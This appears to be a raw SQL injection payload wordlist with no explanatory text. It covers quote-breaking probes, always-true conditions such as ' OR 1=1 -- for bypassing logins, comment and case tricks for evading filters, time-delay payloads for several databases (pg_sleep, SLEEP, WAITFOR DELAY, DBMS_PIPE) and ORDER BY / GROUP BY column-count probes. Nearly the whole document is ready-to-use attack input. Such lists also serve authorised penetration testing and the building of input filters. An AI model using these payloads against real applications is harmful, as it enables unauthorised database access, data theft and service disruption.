'
''
`
"
""
/
//
\
\\
')  
")  
`)  
'))  
"))  
`))
;
;;
'--
'='
'###
'LIKE'
--+##'
'"`)\/&||/**/--+#%0d%0atest
')--+#/**/
'=0--+
-+##' 
'|| (seLEct '') ||'
'|| (seLect '' froM dUal) ||'
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
' AND 1  --+
' and '1'='0
' AND 0  --+
 aNd 1=2 --
 aNd 1=1 --
 oR 1=2 --
 Or 1=1 --
or 1=1--+#
'+OR+1=1--
' or 1=1 #
'--' OR 1 = 1 --
%0a or 1=1
0 or 1=1 --
0 or 1=1 %23
' and '1'='1
' and '1'='1' #
'/**/or
'/**/or/**/'1'/**/=/**/'1
' oR '1'='1
' oR 1=1;--
' oR 1=2;--
' oR 1=1;#
') oR ('x'='x
' Or 1=1 LIMIT 1;--
'+oR+1=1--+##
' AND '1'='1--##
' AnD '1'='2--##
;SElEcT PG_SLEEP(10)--
1'+||+pg_sleep(10)--##
1'+sleep(10)--##
1'+and+sleep(10--##)  
1'+&&+sleep(10)--## 
1'+|+sleep(10)--##
1' WAITFOR DELAY '0:0:10'
'; IF (1=1) WAITFOR DELAY '0:0:10'--##
'; IF (1=1) SELECT pg_sleep(10)'--##
'; IF (1=1) SELECT SLEEP(10)'--##
'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
`1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])   1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)`
`SQLite   1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))   1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))`
' orDEr bY 1+--+#
' orDEr bY 2+--+#
' orDEr bY 3+--+#
' orDEr bY 4+--+#
' orDEr bY 5+--+#
1' GROuP BY 1--+
1' GROuP BY 2--+
1' GROuP BY 3--+
1' GROuP BY 4--+

